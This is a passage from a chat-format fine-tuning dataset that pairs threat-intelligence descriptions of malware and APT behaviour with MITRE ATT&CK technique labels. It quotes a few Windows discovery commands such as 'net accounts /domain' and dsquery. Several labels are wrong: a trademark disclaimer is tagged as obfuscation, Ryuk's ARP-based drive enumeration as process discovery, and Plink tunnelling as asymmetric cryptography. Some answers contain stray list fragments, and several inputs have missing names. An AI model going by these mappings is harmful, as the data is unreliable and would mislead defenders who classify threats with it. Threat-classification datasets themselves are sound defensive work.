- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Like other ransomware threats, Nefilim encrypts files on the target system using AES-128 and adds NEFILIM, NEPHILIM, MERIN, TRAPGET, MEFILIN, TELEGRAM, SIGARETA, or OFFWHITE extension to encrypted files. It uses an RSA-2048 public key embedded in the ransomware executable to encrypt the AES encryption key. It also adds a file that includes the ransom note to the root directory, such as C:\\NEFILIM-DECRYPT.txt."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk attempts to encrypt all mounted drives and hosts that have Address Resolution Protocol (ARP) entries (IP addresses) and it enumerates all mounted drives by calling GetLogicalDrives. For each mounted drive, Ryuk calls GetDriveTypeW to determine the drive’s type. To retrieve IP addresses that have ARP entries, Ryuk calls GetIpNetTable. It iterates through all entries and then tries to enumerate files and folders on the remote host and encrypt the files"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver can use AES-GCM-256 to encrypt a session key for C2 message exchange."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can sleep for a specific time and be set to communicate at specific intervals."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TAINTEDSCRIBE can randomly pick one of five hard-coded IP addresses for C2 communication; if one of the IP fails, it will wait 60 seconds and then try another IP address."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "injects its malware variant, , into the cmd.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The image is downloaded directly, and the shellcode is loaded and executed in memory"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has modified Registry settings for security tools."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a copy of tor2web proxy for HTTPS communications."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rifdoor has been executed from malicious Excel or Word documents containing macros."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some malware uses a list of ordered port numbers to choose a port for C2 traffic, which includes commonly used ports such as 443, 53, 80, 25, and 8080."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Olympic Destroyer uses PsExec to interact with the \"ADMIN$\" network share to execute commands on remote systems."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Siloscape impersonates the main thread of \"CExecSvc.exe\" by calling \"NtImpersonateThread\"."
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can log keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used compromised servers as infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1584.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In November 2019, when MegaCortex v4 appeared, there was a rollback of sorts, bringing the Base64 key back into play and using it to decrypt the malware’s components. The implementation was not the same as previous versions, with that Base64 key embedded into the binary and then passed to a decrypting function instead of passing it as an argument to the command-line"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linux/Ebury is noteworthy for multiple reasons. Although this is something common under the Windows operating system, it is the first time we’ve seen a malicious library being used on POSIX systems. Linux/Ebury also uses innovative tricks to hook functions, discover the address space of the ELF executable that loaded the library and apply patches to its code at runtime. We believe that before using the external library to hook into OpenSSH processes, the author of Linux/Ebury used a patch to modify the source code of OpenSSH, thereby adding “new functionalities” to the software. The first variants found were modified binaries left on the disk. We have also seen usage of the rpm commands to remove signature from the original OpenSSH packages (openssh-server, openssh-clients) and modify the RPM database to update the file hashes with those of the malicious files. This will make the output of rpm --verify openssh-servers report the files as unmodified. However, the output from rpm -qi openssh-servers will clearly show the package is missing its signatures"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity can determine if a user is logged in by checking to see if explorer.exe is running."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "zwShell can obtain the name of the logged-in user on the victim."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 used three different techniques to attempt to compromise targets. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can deobfuscate C2 server responses and unpack its code on targeted hosts."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After compromising a victim, Poseidon Group discovers all running services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Melcoz has gained execution through victims opening malicious links."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Deep Panda uses net.exe to connect to network shares using \"net use\" commands with compromised credentials."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has acquired VPS infrastructure for use in malicious campaigns."
- },
- {
- "role": "assistant",
- "content": "T1583.003 - Virtual Private Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment"
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy', 'T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit has modules such as \"Get-NetDomainTrust\" and \"Get-NetForestTrust\" to enumerate domain and forest trusts."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "dsquery can be used to gather information on domain trusts with \"dsquery * -filter \"(objectClass=trustedDomain)\" -attr *\"."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobian RAT has a feature to perform keylogging on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SysUpdate can determine whether a system has a 32 bit or 64 bit architecture."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Towards the end of July, we observed an intrusion that began with IcedID malware and ended in XingLocker ransomware, a Mountlocker variant. XingLocker made its first appearance in early May of this year. The new group was featured in the AstroLocker ransomware blog, and it has been very active since then."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can modify registry keys, including to enable or disable Remote Desktop Protocol (RDP)."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT can communicate with the C2 via base32-encoded subdomains."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The file reflectively injects a ransomware DLL into the memory of the legitimate running process explorer.exe"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Felismus samples use a custom method for C2 traffic that utilizes Base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can migrate into another process using reflective DLL injection."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Central Command network, including computers both in the headquarters and in the combat zones.The threat involved into this incident is referred as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor – but that's a totally different threat with different functionality. All these builds exhibit common functionality.Agent.btz is a DLL file. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. It will drop its copy on it and it will create autorun.inf file with an instruction to run that file. Agent.btz file is not packed. Thus, it’s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map.File wmcache.nldThe second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file.File winview.ocxThe second spawned thread will log threat activity into the file %system32%\\winview.ocx.This file is also encrypted with the same XOR mask. Note: an attempt to run a valid thumb.db file, which is an OLE-type container has no effect.Files thumb.dd and mssysmgr.ocxAgent.btz is capable to create a binary file thumb.dd on a newly connected drive"
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has collected the username and UID from the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 12: RSA public key 1 Figure 13: RSA public key 2 Figure 14: AES encryption parameters After encryption, the cipher text to be sent over C2 is Base64 encoded"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 launched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs collects a list of accounts with the command \"net users\"."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Companies in multiple sectors are targeted in this campaign, including those operating in the automotive, pharmaceutical, and engineering sector, as well as managed service providers (MSPs"
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT34 can download remote files onto victims."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The discovery modules used with can collect information on accounts and permissions."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MegaCortex has used \"rundll32.exe\" to load a DLL for file encryption."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FALLCHILL can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT-C-36 has prompted victims to accept macros in order to execute the subsequent payload."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has used the Plink utility to tunnel RDP back to C2 infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has the ability to clean up installed files, delete files, and delete itself from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a scheduled task to maintain persistence on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "With the exception of the ‘Speed’ method previously mentioned, the names of the methods called in this chain appear to be fairly random, as seen in the following list: ETransaksi.Speed ETransaksi.diomadnfagaghagh ETransaksi.fjcsERIfjfiojsGHIsdifjksi ETransaksi.gsgjIDJIGJIGJIGJIFDOSpl ETransaksi.FJaioefgkaoeK The last two methods in the chain carry out a majority of the first payload’s functionality"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes"
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuietSieve has taken screenshots every five minutes and saved them to the user's local Application Data folder under `Temp\\SymbolSourceSymbols\\icons` or `Temp\\ModeAuto\\icons`."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT34 has used net.exe in a script with \"net accounts /domain\" to find the password policy of a domain."
- },
- {
- "role": "assistant",
- "content": "T1201 - Password Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rancor has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork collected and exfiltrated files from the infected system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An downloader uses the Windows command \"cmd.exe\" /C whoami to verify that it is running with the elevated privileges of “System.”"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attack group has made incremental changes to ZeroT since our last analysis. The encrypted ZeroT payload, named Mctl.mui, is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Following exploitation with malware, actors created a file containing a list of commands to be executed on the compromised computer."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Those campaigns relied on social engineering attacks through LinkedIn, pushing .NET Core malware masquerading as a PDF document supposedly containing details about a marketing project."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The QakBot proxy module can encapsulate SOCKS5 protocol within its own proxy protocol."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has encrypted files and information before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa performed padding with null bytes before calculating its hash."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obfuscates files or information to help evade defensive measures."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Both Advanced Port Scanner and NetScan have been used to discover local network infrastructure devices and services running on remote hosts. Active Directory queries for remote systems have been performed by ADFind."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery', 'T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
